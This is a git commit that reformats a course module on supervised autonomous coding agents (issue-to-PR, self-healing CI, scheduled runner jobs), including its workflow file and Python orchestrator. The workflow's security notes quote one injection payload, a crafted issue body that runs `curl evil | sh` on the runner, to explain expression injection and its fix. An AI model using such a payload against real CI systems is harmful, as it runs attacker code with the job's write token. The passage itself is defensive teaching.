style(no-slop): remove every em-dash + banned words across all modules + capstone

Apply the no-ai-slop standard (now binding in AGENTS.md): the em-dash character is banned outright (restructured, not blind-replaced), plus the banned word/phrase list (delve, leverage, robust, seamless, truly, unlock, etc.).

0 em-dashes remain in modules + capstone; the only "robust" left is the planted M10 ai-change.patch trap. Module H1 titles use a colon separator. All deliberate teaching devices preserved; labs compile/parse (py/sh/yaml/json); no junk. AGENTS.md updated with the hard no-slop rules.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01TfzV5QvtPDz8LJS3Pu5VLT
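The commit message makes a checkable claim: zero em-dashes in the modules and capstone, and no banned words apart from one planted trap. Below is a minimal sketch of a script that could verify a claim like that. It is hypothetical and not part of this commit. The file name `check_slop.py`, the scanned suffixes, and whole-word matching are all assumptions. `BANNED_WORDS` holds only the six words the message names, because its full list is cut off at "etc.".

```python
"""Hypothetical no-slop check: report em-dash lines and banned words in course files."""
import re
import sys
from pathlib import Path

EM_DASH = "\u2014"  # the character the commit bans outright
# Only the six words the commit message names; its full list ends in "etc." and is not shown.
BANNED_WORDS = ("delve", "leverage", "robust", "seamless", "truly", "unlock")
# Whole-word, case-insensitive match (an assumption): "Robust" is flagged, "robustness" is not.
BANNED_RE = re.compile(r"\b(" + "|".join(BANNED_WORDS) + r")\b", re.IGNORECASE)
# Assumed file types to scan: Markdown prose plus the lab formats the commit says still parse.
SUFFIXES = {".md", ".py", ".sh", ".yml", ".yaml", ".json"}


def find_slop(text: str) -> list[tuple[int, str]]:
    """Return (line_number, reason) for each line with an em-dash and each banned-word match."""
    hits: list[tuple[int, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if EM_DASH in line:
            hits.append((lineno, "em-dash"))
        for match in BANNED_RE.finditer(line):
            hits.append((lineno, f"banned word {match.group(1).lower()!r}"))
    return hits


def iter_files(root: Path):
    """Yield root if it is a file, otherwise every file under it with a scanned suffix."""
    if root.is_file():
        yield root
        return
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in SUFFIXES:
            yield path


def main(paths: list[str]) -> int:
    """Print path:line: reason for every hit; return 1 if anything was found, else 0."""
    found = 0
    for arg in paths:
        for path in iter_files(Path(arg)):
            text = path.read_text(encoding="utf-8", errors="replace")
            for lineno, reason in find_slop(text):
                print(f"{path}:{lineno}: {reason}")
                found += 1
    return 1 if found else 0


if __name__ == "__main__" and len(sys.argv) > 1:
    # Run only when paths are given, e.g. python check_slop.py modules capstone
    sys.exit(main(sys.argv[1:]))
```

The directory names in the usage comment are assumptions. The non-zero exit code is what would make this usable as a CI step. The script only finds problems; per the commit message, each em-dash is restructured by hand rather than blind-replaced. The deliberate `robust` in M10's `ai-change.patch` sits in a `.patch` file, outside the assumed suffix set, so it is not reported. If you widen the set, expect hits from that file.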
@@ -1,6 +1,6 @@
-# Module 25 — Autonomous Agents: Issue-to-PR and Self-Healing CI
+# Module 25. Autonomous Agents: Issue-to-PR and Self-Healing CI
 
-> **Now the AI acts on its own — takes an assigned issue, opens a pull request, even fixes its own
+> **Now the AI acts on its own: it takes an assigned issue, opens a pull request, even fixes its own
 > failing build.** The thing that makes that safe isn't watching it work. It's that everything it
 > produces still lands as a reviewable PR behind the same gates you already built.
 
@@ -43,7 +43,7 @@ By the end of this module you can:
 1. Explain the difference between *assistive* (Module 24) and *autonomous-but-supervised* agents, and
 state where supervision actually happens in each.
 2. Run an issue-to-PR agent: hand it a well-formed issue and have it produce a change on a branch
-that arrives as a reviewable pull request — not a merge.
+that arrives as a reviewable pull request, not a merge.
 3. Watch your existing CI / review / security gates catch a bad agent change before it can reach
 `main`, and explain why that's *structural* supervision rather than *behavioral*.
 4. Build a bounded self-healing loop: when a gate fails, feed the failure back to the agent for a
@@ -62,12 +62,12 @@ read the suggestion and took the action. Supervision was **behavioral**: you wer
 every decision, watching, approving, clicking the button.
 
 That doesn't scale, and watching an agent type is a terrible use of your attention anyway. This
-module makes the agent *take the action* — branch, edit files, commit, open a PR. The obvious worry
+module makes the agent *take the action*: branch, edit files, commit, open a PR. The obvious worry
 is: if I'm not watching, what stops it from shipping garbage?
 
 The answer is the reframe of the whole unit:
 
-> **You don't supervise an autonomous agent by watching it work. You supervise it structurally — by
+> **You don't supervise an autonomous agent by watching it work. You supervise it structurally, by
 > making everything it produces pass through gates that don't care whether a human or a machine wrote
 > the change.**
 
@@ -75,7 +75,7 @@ You already built those gates, for exactly this reason, before you needed them:
 
 | Gate | Built in | What it catches on an agent's PR |
 |------|----------|----------------------------------|
-| **Review** | Module 10 | Plausible-but-wrong logic, scope creep, dropped edge cases — read the diff, not the agent's summary. |
+| **Review** | Module 10 | Plausible-but-wrong logic, scope creep, dropped edge cases. Read the diff, not the agent's summary. |
 | **CI** | Module 14 | Lint failures, broken tests, anything that doesn't build. Runs identically on a human's PR and an agent's. |
 | **Security** | Module 15 | Hardcoded secrets, vulnerable or hallucinated dependencies, SAST findings. |
 | **Recovery** | Module 12 | The backstop: if something slips through and merges, `revert` cleanly undoes it. |
@@ -84,7 +84,7 @@ The agent is autonomous *inside* that box and powerless to escape it. It cannot
 check or an unapproved review. That's the entire safety model, and it's why this module sits at the
 end of the course instead of the start: the box had to exist first.
 
-### Pattern 1 — Issue-to-PR
+### Pattern 1: Issue-to-PR
 
 The headline pattern, and the one Module 9 set up when it called an agent a possible *assignee*. The
 loop is exactly the human collaboration loop from Module 11, with one participant swapped:
@@ -111,10 +111,10 @@ full volume: a confident, plausible, wrong PR that costs more to review than the
 taken.
 
 Crucially: the agent's last step is **open a PR**, not **merge**. The output is a proposal. Nothing
-about "autonomous" means "merges to `main` unseen" — if that's your mental model, this is where you
+about "autonomous" means "merges to `main` unseen"; if that's your mental model, this is where you
 fix it.
 
-### Pattern 2 — Self-healing CI
+### Pattern 2: Self-healing CI
 
 The second pattern points the agent at a *failure* instead of an issue. CI goes red on a branch; an
 agent reads the failing job's logs, proposes a fix, and pushes it back to the same branch so CI runs
@@ -139,9 +139,9 @@ Two design rules make this safe rather than a runaway loop:
 **reviewable PR**: a human confirms it fixed the code, not the evidence. Self-healing CI proposes
 a fix; it doesn't certify one.
 
-### Pattern 3 — Triggered and scheduled agent jobs
+### Pattern 3: Triggered and scheduled agent jobs
 
-How does an agent *start* without you launching it? It runs as a runner job (Module 19) — the same
+How does an agent *start* without you launching it? It runs as a runner job (Module 19), the same
 machinery that runs your CI, pointed at an agent instead of a test suite. Two triggers cover almost
 everything:
 
@@ -152,7 +152,7 @@ everything:
 being a slogan.
 
 Either way it's a job on a runner, which means everything Module 19 taught applies: hosted vs.
-self-hosted, whose compute, and — new and important here — **what credentials that job holds.** A
+self-hosted, whose compute, and, new and important here, **what credentials that job holds.** A
 scheduled agent with a push token and write access is unattended automation acting in your name. It
 needs scoped secrets (Module 17), ideally a sandboxed environment (Module 16), and a healthy
 suspicion of anything it reads, because an issue body or a dependency's README is untrusted input
@@ -163,7 +163,7 @@ surface; treat it like one.
 
 Here's the load-bearing idea of the module, and it's not about the model:
 
-> **An autonomous agent is exactly as safe as the gates it lands behind — no safer.** How much
+> **An autonomous agent is exactly as safe as the gates it lands behind; no safer.** How much
 > autonomy you can responsibly grant is a property of *your CI, review, and security setup*, not of
 > how smart the model is.
 
@@ -203,8 +203,8 @@ the job is non-deterministic and persuasive**, and that changes what "automation
 ## Hands-on lab
 
 **Lab language:** Python (one orchestrator script) plus a little shell and Git. It runs on your own
-machine, any OS, against the `tasks-app` repo from Module 1 — no forge account or paid agent required
-to complete it.
+machine, any OS, against the `tasks-app` repo from Module 1, with no forge account or paid agent
+required to complete it.
 
 You'll drive an issue-to-PR run and a self-healing loop *locally*, so the moving parts are visible
 and reproducible. The "PR" in the local lab is a branch plus a diff you review; the optional Part D
@@ -214,7 +214,7 @@ shows how the exact same flow runs on a real forge as a triggered/scheduled job.
 
 - Your `tasks-app` Git repo (Modules 1–2), with the `test_tasks.py` from Module 14 present and
 `pytest` and `ruff` installed (`pip install pytest ruff`). The lab runs these as the CI gate,
-locally — the same checks `ci.yml` runs in Module 14.
+locally, the same checks `ci.yml` runs in Module 14.
 - The starter files in this module's `lab/` folder:
 - `agent_runner.py`: the orchestrator. Drives the agent (real or simulated), then runs the gate,
 and only ever produces a branch + PR proposal, never a merge.
@@ -225,18 +225,18 @@ shows how the exact same flow runs on a real forge as a triggered/scheduled job.
 - *Optional, for the "for real" path:* an agentic coding tool that has a non-interactive / headless /
 one-shot mode (most expose a flag for running a single prompt without the interactive UI). If you
 don't have one wired up, the script's `--simulate` mode demonstrates every gate and loop
-deterministically with no agent at all — do that first regardless.
+deterministically with no agent at all; do that first regardless.
 
-> **What `--simulate` actually does — read this before Part A.** To stay deterministic and never
+> **What `--simulate` actually does (read this before Part A).** To stay deterministic and never
 > touch your real `cli.py` / `tasks.py`, `--simulate` does **not** implement
 > `issue-delete-command.md`. Instead it writes a small, self-contained stand-in (`agent_demo.py` with
 > a `discount()` function, plus its test) and runs the *real* gate (ruff + pytest) against that. So
-> Parts A–C exercise the machinery and the gates — not the delete feature itself. The issue is only
-> truly implemented in **Part D**, with a live agent. When you review the simulated diff you'll see
+> Parts A–C exercise the machinery and the gates, not the delete feature itself. The issue is only
+> actually implemented in **Part D**, with a live agent. When you review the simulated diff you'll see
 > the `discount()` demo, not a `delete` command; that's expected, and it's why the simulation is
 > reproducible enough to teach with.
 
-### Part A — See the gate catch a bad change (simulated, no agent needed)
+### Part A: See the gate catch a bad change (simulated, no agent needed)
 
 Copy `agent_runner.py` and `issue-delete-command.md` into your `tasks-app` folder, along with this
 module's `lab/.gitignore` (append its lines to the `.gitignore` you already have from Module 2 rather
@@ -258,7 +258,7 @@ a change, the script runs the gate (`ruff check` then `pytest -q`), a test fails
 supervision. It didn't matter that the change looked plausible; the gate caught it, and nothing
 reached `main`.
 
-### Part B — See a good change land as a PR proposal
+### Part B: See a good change land as a PR proposal
 
 ```bash
 python agent_runner.py issue-to-pr issue-delete-command.md --simulate good
@@ -272,7 +272,7 @@ self-contained `discount()` stand-in, not a `delete` command. The review *motion
 you are the human gate, and that step doesn't go away just because an agent did the typing. The agent
 stops at a PR; it never merges.
 
-### Part C — Run the self-healing loop
+### Part C: Run the self-healing loop
 
 ```bash
 python agent_runner.py self-heal --simulate bad
@@ -284,7 +284,7 @@ fix, re-runs the gate, and repeats up to its retry cap. With `--simulate bad` th
 second attempt and the result is offered as a PR proposal. Run it with `--simulate stuck` to watch the
 cap trip: after N attempts it gives up and tags the work for a human instead of looping forever.
 
-### Part D — Do it for real (optional)
+### Part D: Do it for real (optional)
 
 Two ways to go from simulation to a genuine autonomous run:
 
@@ -302,7 +302,7 @@ Two ways to go from simulation to a genuine autonomous run:
 
 2. **On a forge, triggered/scheduled.** Read `agent-job.yml`. It's a runner workflow (Module 19) that
 fires when an issue gets an `agent` label *and* on a nightly schedule, runs the agent on the
-runner, and opens a PR — which then hits your normal CI (Module 14) and security (Module 15) gates
+runner, and opens a PR, which then hits your normal CI (Module 14) and security (Module 15) gates
 and waits for review. Wiring it up needs a scoped token in your forge's secrets (Module 17); the
 file is commented with exactly what to set and what *not* to grant. This is the "workflow runs
 itself" endpoint, and it's intentionally the last thing you turn on.
@@ -311,7 +311,7 @@ Two ways to go from simulation to a genuine autonomous run:
 
 ## Where it breaks
 
-The honest limits — and for autonomous agents, the limits *are* the lesson:
+The honest limits, and for autonomous agents the limits *are* the lesson:
 
 - **Your gates are the ceiling, and most gates are weaker than they look.** Thin test coverage,
 skipped security scans, or review-by-rubber-stamp don't just reduce quality, they directly set how
@@ -319,12 +319,12 @@ The honest limits — and for autonomous agents, the limits *are* the lesson:
 The honest version of "should I let an agent do this unattended?" is "would my CI catch it if it got
 it wrong?"
 - **Self-healing can fix the evidence instead of the bug.** Editing the test until it passes, widening
-an exception so the error is swallowed, deleting an assertion — all turn CI green and all are wrong.
+an exception so the error is swallowed, deleting an assertion: all turn CI green and all are wrong.
 The bounded-retry cap stops the *loop*; only human review of the diff stops the *cheat*. Never let a
 self-heal PR auto-merge on green alone.
 - **"Autonomous" is not "auto-merge."** Everything in this module stops at a PR. The moment you wire
 an agent to merge its own work to `main` without a gate that a human controls, you've left supervised
-autonomy and you own whatever it ships. That's a deliberate decision, not a default — and it's out
+autonomy and you own whatever it ships. That's a deliberate decision, not a default, and it's out
 of scope for this course.
 - **Unattended agents are an attack surface, not just a convenience.** A scheduled agent holds
 credentials and reads untrusted input (issue bodies, comments, dependency files) straight into its
@@ -336,7 +336,7 @@ The honest limits — and for autonomous agents, the limits *are* the lesson:
 concurrency, and put a human checkpoint on anything that hasn't converged.
 - **Flaky gates make autonomy actively worse.** A nondeterministic test that fails 1-in-5 will send a
 self-healing agent chasing a bug that isn't there. Autonomy demands *more* gate discipline than
-manual work, not less — fix the flake before you point an agent at it.
+manual work, not less. Fix the flake before you point an agent at it.
 
 ---
 
@@ -345,13 +345,13 @@ The honest limits — and for autonomous agents, the limits *are* the lesson:
 **You're done when:**
 
 - You ran an issue-to-PR flow (simulated or real) and the result was a **branch + PR proposal**, not a
-merge — and you can point to exactly where a human or a gate still has to say yes.
+merge, and you can point to exactly where a human or a gate still has to say yes.
 - You watched the gate **reject a bad agent change** (`--simulate bad`) and accept a good one, and you
 can explain why that's structural supervision rather than watching the agent work.
 - You ran a self-healing loop, saw it propose a fix on failure, and saw the retry **cap trip**
 (`--simulate stuck`) instead of looping forever.
 - You can finish this sentence without hand-waving: *"I'd let an agent do X unattended because my
-gates would catch it if it got X wrong — specifically the gate from Module ___."*
+gates would catch it if it got X wrong, specifically the gate from Module ___."*
 - You can name the three patterns (issue-to-PR, self-healing CI, triggered/scheduled jobs) and the
 four gates that make any of them safe (review M10, CI M14, security M15, recovery M12).
 

@@ -1,17 +1,17 @@
 # Keep the agent's proposed diff clean (Module 25, Part B).
 #
-# propose_pr() in agent_runner.py runs `git add -A` on purpose — a real agent (Part D) may touch
+# propose_pr() in agent_runner.py runs `git add -A` on purpose; a real agent (Part D) may touch
 # files you can't enumerate ahead of time, so staging everything is the correct behavior. This
 # .gitignore is what keeps that honest: it excludes the Python caches and the lab scaffolding you
 # copied into tasks-app, so the commit the agent proposes is ONLY its real change (agent_demo.py and
-# its test in the simulated path) — not binary .pyc noise or the orchestrator itself.
+# its test in the simulated path), not binary .pyc noise or the orchestrator itself.
 
 # Python / tool caches
 __pycache__/
 .pytest_cache/
 .ruff_cache/
 
-# Lab scaffolding copied into tasks-app for this module — not part of the agent's change.
+# Lab scaffolding copied into tasks-app for this module, not part of the agent's change.
 agent_runner.py
 issue-delete-command.md
 agent-job.yml

@@ -1,15 +1,15 @@
-# Reference: an autonomous agent running as a RUNNER JOB (Module 19) — triggered and scheduled.
+# Reference: an autonomous agent running as a RUNNER JOB (Module 19), triggered and scheduled.
 #
 # This is the "for real" version of agent_runner.py: instead of you launching the agent, the forge
 # launches it on a runner in response to an event or a timer, and the agent opens a PR. That PR then
-# hits your NORMAL gates — CI (Module 14), security scanning (Module 15), and human review (Module
-# 10) — exactly like a human's PR. The supervision is structural; this file just automates the start.
+# hits your NORMAL gates: CI (Module 14), security scanning (Module 15), and human review (Module
+# 10), exactly like a human's PR. The supervision is structural; this file just automates the start.
 #
 # GitHub Actions flavor (same as Module 14's ci.yml), so it goes in .github/workflows/. Equivalents:
 # * GitLab: a job with `rules:` on $CI_PIPELINE_SOURCE + a `workflow:` schedule.
 # * Forgejo/Gitea: the same YAML under .forgejo/workflows/ or .gitea/workflows/.
 #
-# DO NOT enable this blindly. Read the security notes at the bottom first — an unattended agent with a
+# DO NOT enable this blindly. Read the security notes at the bottom first; an unattended agent with a
 # write token is automation acting in your name. This is the last thing you turn on, on purpose.
 
 name: agent-issue-to-pr
@@ -18,7 +18,7 @@ on:
 # TRIGGERED: fire when an issue gets the `agent` label. Event in -> agent runs -> PR out.
 issues:
 types: [labeled]
-# SCHEDULED: also attempt work overnight. This is "the workflow runs itself" — keep it cheap.
+# SCHEDULED: also attempt work overnight. This is "the workflow runs itself", so keep it cheap.
 schedule:
 - cron: "0 6 * * *" # 06:00 UTC daily; adjust to your timezone and budget.
 
@@ -27,7 +27,7 @@ jobs:
 # Only run the triggered path when the label is actually `agent` (labeled events fire for ANY
 # label). The scheduled path has no label, so allow it through too.
 if: ${{ github.event_name == 'schedule' || github.event.label.name == 'agent' }}
-runs-on: ubuntu-latest # whose compute this is — see Module 19 for self-hosted runners.
+runs-on: ubuntu-latest # whose compute this is; see Module 19 for self-hosted runners.
 
 # Least privilege (Module 17): grant ONLY what opening a PR needs. Not admin, not secrets access.
 permissions:
@@ -49,13 +49,13 @@ jobs:
 
 - name: Run the agent on a fresh branch
 env:
-# The agent's model credentials come from a SCOPED secret you set in the forge — never
+# The agent's model credentials come from a SCOPED secret you set in the forge, never
 # hardcoded here (Module 17). Keep this provider-neutral: it's whatever your agent needs.
 AGENT_API_KEY: ${{ secrets.AGENT_API_KEY }}
 # Point AGENT_CMD at your agentic tool's non-interactive / one-shot mode.
 AGENT_CMD: "your-agent-cli --print --prompt-file {prompt_file}"
 # The issue body is UNTRUSTED. Pass it through env, never interpolated into the run: script
-# below — see the security notes (Actions expression-injection) for why this matters.
+# below; see the security notes (Actions expression-injection) for why this matters.
 BODY: ${{ github.event.issue.body }}
 run: |
 git switch -c "agent/issue-${{ github.event.issue.number || github.run_id }}"
@@ -74,9 +74,9 @@ jobs:
 
 # --- Security notes (read before enabling) -------------------------------------------------------
 # * Actions expression-injection (THIS file, a different bug from prompt injection): never paste
-# ${{ github.event.issue.body }} — or any untrusted ${{ ... }} — directly into a run: script. The
+# ${{ github.event.issue.body }} (or any untrusted ${{ ... }}) directly into a run: script. The
 # ${{ }} is expanded into the script TEXT before the shell runs it, so a crafted issue body like
-# `"; curl evil | sh; "` executes on the runner before the agent is even invoked — with this job's
+# `"; curl evil | sh; "` executes on the runner before the agent is even invoked, with this job's
 # write token in scope. The fix above passes the body through env: (BODY) and reads it as "$BODY",
 # so the shell sees it as data, not code. Expression-injection attacks the runner's shell; prompt
 # injection (below) attacks the agent's reasoning. Defend against both.

@@ -1,19 +1,19 @@
-"""Module 25 lab — an autonomous-but-supervised agent orchestrator.
+"""Module 25 lab: an autonomous-but-supervised agent orchestrator.
 
 This is the smallest honest version of the two patterns in the module:
 
-* issue-to-pr — read an issue, let an agent implement it, run the gate, produce a PR PROPOSAL.
-* self-heal — run the gate; on failure, feed the failure back to the agent for a fix,
+* issue-to-pr : read an issue, let an agent implement it, run the gate, produce a PR PROPOSAL.
+* self-heal : run the gate; on failure, feed the failure back to the agent for a fix,
 bounded by a retry cap; produce a PR PROPOSAL.
 
 The load-bearing idea is in one place and you should be able to point at it: the agent NEVER merges.
-Every path ends at `propose_pr()` — a branch, a commit, and the command *you* would run to open the
+Every path ends at `propose_pr()`: a branch, a commit, and the command *you* would run to open the
 PR. The CI/review/security gates (Modules 14/15/10) and recovery (Module 12) are what supervise it,
 not a human watching it type.
 
 Run it two ways:
 
-1. Simulated (no agent needed, fully deterministic) — see the machinery and the gates:
+1. Simulated (no agent needed, fully deterministic); see the machinery and the gates:
 python agent_runner.py issue-to-pr issue-delete-command.md --simulate good
 python agent_runner.py issue-to-pr issue-delete-command.md --simulate bad
 python agent_runner.py self-heal --simulate bad
@@ -21,9 +21,9 @@ Run it two ways:
 
 Simulation works on a SELF-CONTAINED demo target (agent_demo.py + test_agent_demo.py) so it is
 deterministic and never corrupts your real tasks-app files. The gate it runs (ruff + pytest) is
-the real one — the same checks Module 14's CI runs.
+the real one, the same checks Module 14's CI runs.
 
-2. Real agent — drives your own agentic tool against the actual issue. Point AGENT_CMD at your
+2. Real agent: drives your own agentic tool against the actual issue. Point AGENT_CMD at your
 tool's non-interactive / one-shot mode, then drop --simulate:
 export AGENT_CMD='your-agent-cli --print --prompt-file {prompt_file}'
 python agent_runner.py issue-to-pr issue-delete-command.md
@@ -52,7 +52,7 @@ CONFIG_CANDIDATES = ["AGENTS.md", ".agent/instructions.md", "agent-config.md"]
 
 
 # --------------------------------------------------------------------------------------------------
-# The gate — the same lint + test checks Module 14 runs in CI, run locally so they're reproducible.
+# The gate: the same lint + test checks Module 14 runs in CI, run locally so they're reproducible.
 # This is the structural supervision. It does not care whether a human or an agent wrote the change.
 # --------------------------------------------------------------------------------------------------
 def run_gate() -> tuple[bool, str]:
@@ -65,7 +65,7 @@ def run_gate() -> tuple[bool, str]:
 try:
 proc = subprocess.run(cmd, capture_output=True, text=True)
 except FileNotFoundError:
-out.append(f" ! {cmd[0]} not installed — `pip install pytest ruff`. Treating as a gate FAIL.")
+out.append(f" ! {cmd[0]} not installed; run `pip install pytest ruff`. Treating as a gate FAIL.")
 ok = False
 continue
 out.append(proc.stdout.rstrip())
@@ -78,7 +78,7 @@ def run_gate() -> tuple[bool, str]:
 
 
 # --------------------------------------------------------------------------------------------------
-# The agent — real (your tool) or simulated (deterministic, for the lab).
+# The agent: real (your tool) or simulated (deterministic, for the lab).
 # --------------------------------------------------------------------------------------------------
 def find_config() -> Path | None:
 env = os.environ.get("AGENT_CONFIG")
@@ -93,14 +93,14 @@ def find_config() -> Path | None:
 def build_prompt(task: str, *, issue_path: Path | None = None, failure: str | None = None) -> str:
 """Assemble the agent's brief: standing config (Module 5) + the specific task (issue or failure)."""
 parts = ["You are working in a Git repository on the current branch. Make the change directly in",
-"the files. Do not commit, push, or merge — just edit. Follow the project's conventions."]
+"the files. Do not commit, push, or merge; just edit. Follow the project's conventions."]
 config = find_config()
 if config:
 parts += ["", f"# Project conventions (from {config})", config.read_text()]
 if issue_path:
 parts += ["", "# Task (issue to implement)", issue_path.read_text()]
 if failure:
-parts += ["", "# A CI check just failed. Fix the CODE so it passes — do not weaken or delete",
+parts += ["", "# A CI check just failed. Fix the CODE so it passes; do not weaken or delete",
 "# the test to make it pass. Here is the failing output:", "```", failure, "```"]
 return "\n".join(parts)
 
@@ -134,21 +134,21 @@ def simulate_implement(variant: str) -> None:
 )
 if variant == "good":
 DEMO_SRC.write_text("def discount(price, pct):\n return price - price * pct / 100\n")
-else: # 'bad' — plausible but wrong: treats the percent as a flat amount.
+else: # 'bad': plausible but wrong, treats the percent as a flat amount.
 DEMO_SRC.write_text("def discount(price, pct):\n return price - pct\n")
 
 
 def simulate_fix(variant: str, attempt: int) -> None:
 if variant == "stuck":
-# The "agent" keeps producing plausible, still-wrong fixes — the loop must give up, not run forever.
+# The "agent" keeps producing plausible, still-wrong fixes, so the loop must give up, not run forever.
 DEMO_SRC.write_text(f"def discount(price, pct):\n return price - pct - {attempt}\n")
-else: # 'bad' — converges on the second attempt with the correct formula.
+else: # 'bad': converges on the second attempt with the correct formula.
 DEMO_SRC.write_text("def discount(price, pct):\n return price - price * pct / 100\n")
 
 
 def simulate_cleanup() -> None:
 """Discard the simulator's demo artifacts. These are UNTRACKED new files, so `git restore`
-(which only touches tracked files) can't remove them — the simulator cleans up after itself."""
+(which only touches tracked files) can't remove them, so the simulator cleans up after itself."""
 for path in (DEMO_SRC, DEMO_TEST):
 path.unlink(missing_ok=True)
 
@@ -163,7 +163,7 @@ def in_git_repo() -> bool:
 
 def ensure_branch(name: str) -> None:
 """Create and switch to the agent's working branch. The orchestrator owns this git step the same
-way agent-job.yml's runner does (`git switch -c`) — you direct the automation and then verify the
+way agent-job.yml's runner does (`git switch -c`): you direct the automation and then verify the
 branch (`git branch`), instead of typing `git checkout` by hand. No-op outside a Git repo."""
 if not in_git_repo():
 return
@@ -175,7 +175,7 @@ def ensure_branch(name: str) -> None:
 
 def propose_pr(message: str) -> None:
 print("\n" + "=" * 80)
-print("GATE PASSED. Proposing a PR — NOT merging. A human reviews the diff (Module 10).")
+print("GATE PASSED. Proposing a PR, NOT merging. A human reviews the diff (Module 10).")
 print("=" * 80)
 if in_git_repo():
 subprocess.run(["git", "add", "-A"])
@@ -188,7 +188,7 @@ def propose_pr(message: str) -> None:
 print(f" git push -u origin {branch}")
 print(" # ...and open a pull request on your forge. CI + security gates run there.")
 else:
-print("\n(Not a Git repo — skipping commit. In your tasks-app this would commit to the branch.)")
+print("\n(Not a Git repo, so skipping commit. In your tasks-app this would commit to the branch.)")
 print("\nThe agent stops here. It cannot merge. That is the whole safety model.")
 
 
@@ -249,14 +249,14 @@ def cmd_self_heal(simulate: str | None) -> int:
 print(gate_output)
 if attempt > RETRY_CAP - 1:
 break
-print(f"\n[self-heal] gate red — attempt {attempt}/{RETRY_CAP - 1}: asking the agent for a fix.")
+print(f"\n[self-heal] gate red, attempt {attempt}/{RETRY_CAP - 1}: asking the agent for a fix.")
 if simulate:
 simulate_fix(simulate, attempt)
 else:
 run_real_agent(build_prompt("fix", failure=gate_output))
 
 print("\n" + "=" * 80)
-print(f"SELF-HEAL GAVE UP after {RETRY_CAP - 1} attempts. Handing off to a human — NOT looping forever.")
+print(f"SELF-HEAL GAVE UP after {RETRY_CAP - 1} attempts. Handing off to a human, NOT looping forever.")
 print("This cap is what stops an agent burning a runner bill chasing a flaky or impossible fix.")
 print("=" * 80)
 return 2

@@ -1,6 +1,6 @@
 <!--
 The agent's INPUT for Module 25. This is a well-formed issue in the Module 9 format: title,
-context, acceptance criteria, scope. It is deliberately a good candidate for an agent — well-
+context, acceptance criteria, scope. It is deliberately a good candidate for an agent: well-
 scoped, concrete, and it mirrors a pattern already in the codebase (the existing `done` command).
 
 The orchestrator (agent_runner.py) reads this file and pairs it with your committed AI config
@@ -15,7 +15,7 @@
 
 `tasks-app` can `add`, `list`, and mark a task `done`, but there's no way to remove a task. Once a
 task is added by mistake it stays forever. The `done` command already takes an index and mutates the
-list through a method on `TaskList`, so a `delete` command should follow the exact same shape — this
+list through a method on `TaskList`, so a `delete` command should follow the exact same shape. This
 is a patterned change, not a design problem.
 
 ## Acceptance criteria
@@ -25,7 +25,7 @@ is a patterned change, not a design problem.
 - `delete` with an out-of-range or non-integer index prints a clear error (e.g.
 `no task at index 99`) and exits non-zero, instead of dumping a traceback.
 - The logic lives on `TaskList` (a `remove(index)` method or equivalent), mirroring how `complete`
-works — `cli.py` only parses arguments and calls it.
+works; `cli.py` only parses arguments and calls it.
 - A test covers: a successful delete removes the right task, and an out-of-range delete is handled.
 
 ## Out of scope